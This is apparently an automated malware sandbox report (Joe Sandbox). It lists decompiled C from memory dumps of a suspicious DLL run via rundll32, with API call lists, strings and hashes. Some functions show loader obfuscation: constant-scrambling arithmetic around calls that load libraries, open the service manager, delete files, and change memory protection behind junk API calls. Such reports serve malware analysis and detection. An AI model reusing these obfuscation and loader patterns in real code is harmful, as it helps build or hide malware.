							_v8 = _v8 | GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000200;
						}
						_t60 = GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t66 = VirtualProtect( *_t84, _t84[2] + GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0, _v8, _t119 + 0x10 + _t60 *  *0x100440d8 * 4); // executed
						asm("sbb eax, eax");
						_t68 =  ~( ~_t66);
						L13:
						return _t68;
					}
					if( *__ebx != __ebx[1]) {
						L9:
						_t68 = 1;
						goto L13;
					}
					_t74 = 0;
					if(__ebx[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L8:
						 *((intOrPtr*)(_a4 + 0x20))( *_t84, _t84[2], GetCurrencyFormatW(_t74, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", _t74, L"xadqsavcbdfewescGADW", _t106) *  *0x100440e0 + 0x4000,  *((intOrPtr*)(_a4 + 0x34)));
						goto L9;
					} else {
						if(GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + __ebx[2] %  *(_a4 + 0x3c) != 0) {
							goto L9;
						}
						_t106 = 0x22b9;
						_t74 = 0;
						goto L8;
					}
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100022AA
GetCurrencyFormatW.KERNEL32 ref: 100022EB
GetCurrencyFormatW.KERNEL32 ref: 10002322

Strings

xadqsavcbdfewescGADW, xrefs: 10002298, 100022DE, 10002315, 10002349, 10002368, 10002396, 100023D0, 10002412, 10002434, 10002456
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002289, 1000229E, 100022E4, 1000231B, 10002350, 10002378, 100023A6, 100023DE, 100023E3, 10002419, 1000243B, 1000245D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction ID: 001e048e4435a5d91bd341ad1d3e9c5f26db428d8a62d425f6a780c80bac8da3
Opcode Fuzzy Hash: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction Fuzzy Hash: E651E1726002117FE301CB50CD86F97BBA9EB8B751F158418FB06EF191D730A864CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10010763 Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10010763() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x10048600
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x2d81240
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100010C9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100010C9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10020F40(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x2d81240
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100442e0;
							E100209E8( &_v28, 0x1003e1e4);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10044378;
							E100209E8( &_v36, 0x1003e298);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10044410;
							E100209E8( &_v44, 0x1003e2dc);
							asm("int3");
							_push(4);
							E1001FBC4(E10032E9B, _t69, _t82, _t86);
							_t78 = E100105C8(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000E58E(_t78);
							}
							return E1001FC9C(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x2d81240
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x2d81240
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x2d81240
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(10048600,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010772
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107C8
GlobalHandle.KERNEL32(02D81240), ref: 100107D1
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107DA
GlobalReAlloc.KERNEL32 ref: 100107F1
GlobalHandle.KERNEL32(02D81240), ref: 10010803
GlobalLock.KERNEL32 ref: 1001080A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010814
GlobalLock.KERNEL32 ref: 10010820
_memset.LIBCMT ref: 10010839
LeaveCriticalSection.KERNEL32(?,00000058,10003840), ref: 10010865

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction ID: cc07cb1ae1718158ec5411955b1f766252c932f609a865be9411df0e50f52d34
Opcode Fuzzy Hash: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction Fuzzy Hash: 013180757047159FE325DF24CC88A2A77E9FF44241B01892DF9D6CB652DBB1F8848B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001F6F4 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E1001F6F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10041288);
				_t8 = E10022714(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10022759(_t8);
				}
				if( *0x1004a564 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10048aa4); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10020B71(_t31);
						 *_t10 = E10020B36(GetLastError());
					}
					goto L9;
				}
				E10023FE8(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10024061(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002408C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001F74A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 1001F712

Part of subcall function 10023FE8: __mtinitlocknum.LIBCMT ref: 10023FFC
Part of subcall function 10023FE8: __amsg_exit.LIBCMT ref: 10024008
Part of subcall function 10023FE8: EnterCriticalSection.KERNEL32(00000001,00000001,?,10025F0B,0000000D,10041560,00000008,10025FFD,00000001,?,?,00000001,?,?,1002092A,00000001), ref: 10024010

___sbh_find_block.LIBCMT ref: 1001F71D
___sbh_free_block.LIBCMT ref: 1001F72C
RtlFreeHeap.NTDLL(00000000,?,10041288,0000000C,10025E61,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001), ref: 1001F75C
GetLastError.KERNEL32(?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001,00000001,?,10025F0B,0000000D,10041560), ref: 1001F76D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction ID: dcea96c0beb71c26c32ed6edefd011e4960108453953efdd22255c92b90fc265
Opcode Fuzzy Hash: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction Fuzzy Hash: 3E01A235809311EAEB21EBB0AD4A75E3BA4DF05364F51421CF500EE0E1CB34D9C0CA55

Uniqueness

Uniqueness Score: -1.00%

Function 0486F6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0486F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048632C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E048552F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}

0x0486f6a8
0x0486f6ab
0x0486f6ad
0x0486f6b0
0x0486f6b3
0x0486f6b4
0x0486f6b5
0x0486f6ba
0x0486f6c4
0x0486f6cb
0x0486f6d2
0x0486f6d9
0x0486f6dd
0x0486f6e4
0x0486f6eb
0x0486f6f2
0x0486f6f6
0x0486f6fd
0x0486f704
0x0486f70b
0x0486f70f
0x0486f716
0x0486f736
0x0486f73f
0x0486f745

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0486F73F

Strings

o;a, xrefs: 0486F6D2
CJD, xrefs: 0486F6A1
!, xrefs: 0486F716

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: o;a$!$CJD
API String ID: 1029625771-3784180784
Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction ID: 94cb2c83a57f298084f8a674c30bcf0a03b7a288104f87938435211a713d3caf
Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
Instruction Fuzzy Hash: A01115B5C01308BBCB01EFE4C80988EBBB4EB10318F508588E91566251D3B95B54DF92

Uniqueness

Uniqueness Score: -1.00%

Function 10034C48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10034C48() {
				signed int _t1;
				intOrPtr _t6;
				short* _t7;
				short* _t10;

				_t10 = L"xadqsavcbdfewescGADW";
				_t7 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t1 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9); // executed
				 *0x10046a90 = _t1 *  *0x100440dc + 1;
				 *0x10046a94 = 8;
				 *0x10046a98 = 2;
				 *0x10046a9c = 4;
				_t6 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9) *  *0x100440cc + 0x10;
				 *0x10046aa0 = _t6;
				 *0x10046aa4 = 0x80;
				 *0x10046aa8 = 0x20;
				 *0x10046aac = 0x40;
				return _t6;
			}

0x10034c57
0x10034c5f
0x10034c6d
0x10034c83
0x10034c88
0x10034c92
0x10034c9c
0x10034cb1
0x10034cb5
0x10034cba
0x10034cc4
0x10034cce
0x10034cd9

APIs

GetCurrencyFormatW.KERNEL32 ref: 10034C6D
GetCurrencyFormatW.KERNEL32 ref: 10034CA6

Strings

xadqsavcbdfewescGADW, xrefs: 10034C57, 10034C5C, 10034C7B
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10034C5F, 10034C64

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
Instruction ID: 5c52f8c4d727126c86f77c33851e7c0b5fa0ee0d1993fb30478bf6546009c500
Opcode Fuzzy Hash: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
Instruction Fuzzy Hash: 94F01DF1140625EEF3008B85CEC6F433BA8E34B718F11800AE344EB6D1D7B614688F6A

Uniqueness

Uniqueness Score: -1.00%

Function 04867E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04867E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E048632C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E048552F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}

0x04867e1b
0x04867e20
0x04867e23
0x04867e24
0x04867e27
0x04867e2a
0x04867e2b
0x04867e2c
0x04867e31
0x04867e3b
0x04867e3e
0x04867e41
0x04867e48
0x04867e4c
0x04867e53
0x04867e5a
0x04867e61
0x04867e65
0x04867e7d
0x04867e80
0x04867e87
0x04867e8e
0x04867e95
0x04867ea5
0x04867eb2
0x04867eb8

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04867EB2

Strings

_, xrefs: 04867E95

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: _
API String ID: 1889721586-4005583852
Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction ID: 604e37b65562d7925e240995738da6a12a0a34911d82edd5c2c46e11bf294bac
Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
Instruction Fuzzy Hash: D71133B1C01218BBDF01DFD8D80A8CEBFB9EF04344F108489E815A2251D3B68B20EF91

Uniqueness

Uniqueness Score: -1.00%

Function 04852CC4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E04852CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048632C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E048552F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}

0x04852ccb
0x04852cce
0x04852cd0
0x04852cd3
0x04852cd6
0x04852cd9
0x04852cda
0x04852cdb
0x04852ce0
0x04852cea
0x04852cf1
0x04852d0c
0x04852d0f
0x04852d13
0x04852d1a
0x04852d21
0x04852d25
0x04852d2c
0x04852d33
0x04852d3a
0x04852d41
0x04852d45
0x04852d49
0x04852d59
0x04852d68
0x04852d6e

APIs

RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 04852D68

Strings

!z, xrefs: 04852D3A

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: !z
API String ID: 1279760036-1244814218
Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction ID: a89abcd61b5fd184bf2e889c1c2d7ff0c3634af1794f28b93db062b88583067b
Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
Instruction Fuzzy Hash: CA11DFB2C04208BBDB41EFE8D94A8DEBFB4EF45304F108588E92566251D3B59B20EF91

Uniqueness

Uniqueness Score: -1.00%

Function 048658BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E048658BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				WCHAR* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__edx);
				_push(__ecx);
				E048632C4(_t27);
				_v16 = 0x13586;
				_v16 = 0x4c59cc;
				_v16 = _v16 ^ 0xe50d706a;
				_v16 = _v16 ^ 0xe54f7d54;
				_v12 = 0x3bf9e4;
				_v12 = _v12 + 0x106;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x1c92743a;
				_v8 = 0x406212;
				_v8 = _v8 * 0x60;
				_v8 = _v8 + 0xffffd8c7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000758b5;
				E048552F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
				_t35 = DeleteFileW(_t38); // executed
				return _t35;
			}

0x048658c4
0x048658c7
0x048658c9
0x048658ca
0x048658cb
0x048658d0
0x048658da
0x048658e1
0x048658e8
0x048658ef
0x048658f6
0x04865911
0x04865914
0x0486591b
0x04865926
0x04865929
0x04865930
0x04865934
0x04865944
0x0486594d
0x04865953

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0486594D

Strings

T}O, xrefs: 048658E8

Memory Dump Source

Source File: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true

Associated: 00000003.00000002.256523961.0000000004850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.256563677.0000000004872000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: T}O
API String ID: 4033686569-2430299532
Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction ID: ee916f9924edda7e2a0885be5d3f2c87ebc8e390eeb07a983f93ba925327e8d9
Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction Fuzzy Hash: 270102B5D01208FBDB04DFA8D9469DEBFB4EB00318F20C199E914B7250E7B82B548F96

Uniqueness

Uniqueness Score: -1.00%

Function 1000373C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000373C() {
				int _t1;

				_t1 =  *0x10046a8c; // 0x2d4ff00
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				 *((intOrPtr*)(E10003122(_t1, "DllRegisterServer")))(); // executed
				return 0;
			}

0x1000373c
0x10003743
0x10003746
0x10003746
0x10003759
0x1000375d

APIs

ExitProcess.KERNEL32 ref: 10003746

Strings

DllRegisterServer, xrefs: 1000374C

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
